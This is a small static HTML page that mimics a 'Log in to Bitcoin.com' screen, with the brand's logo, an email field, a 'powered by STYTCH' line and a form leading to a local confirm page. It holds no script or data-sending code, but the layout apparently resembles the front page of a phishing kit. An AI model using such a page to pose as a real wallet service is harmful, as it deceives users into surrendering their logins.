<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Blockchain</title>
</head>
<style>
    *{
        margin: 0;
        font-family:  sans-serif;
    }body{
        background-color: #F1F7FD;
    }
    nav{
        /* background-color: rgb(181, 222, 228); */
        background-color: #F1F7FD;
        height: 50px;
        display: flex;
        align-items: center;
    }
    img{
        height: 40px;
    }
    section{
        display: flex;
        align-items: center;
        justify-content: center;
    }
    form{
        margin-top: 100px;
        text-align: center;
        background-color: white;
        padding: 20px;
        border-radius: 10px;
    }
    input{
        /* display: block; */
        width: 200px;
        margin-top: 30px;
        border-radius: 8px;
        width: 340px;
        padding: 15px;
        border: 1px solid rgba(211, 205, 205, 0.644);

    }
    button{
        width: 360px;
        padding: 15px;
        background-color: rgb(57, 144, 237);
        border: none;
        color: white;
        border-radius: 8px;
        margin-top: 30px;
        margin-bottom: 40px;
    }
    p{
        margin-bottom: 10px;
    }
</style>
<body>
    <header>
        <nav>
            <div><img src="img/bitcoin-com.png" alt=""></div>
            
        </nav>
    </header>
    <section>
        <form action="confirm.html">
            <h2>Log in to Bitcoin.com</h2>
            <input type="email" name="" placeholder="example@email.com" id=""><br>
            <button>continue with email</button>
            <p>powered by <span>STYTCH</span></p>
            <p>by clicking, you agree to our User</p>
            <p>Agreement, Wallet Service Terms, and Privacy policy.</p>
        </form>
    </section>
</body>
</html>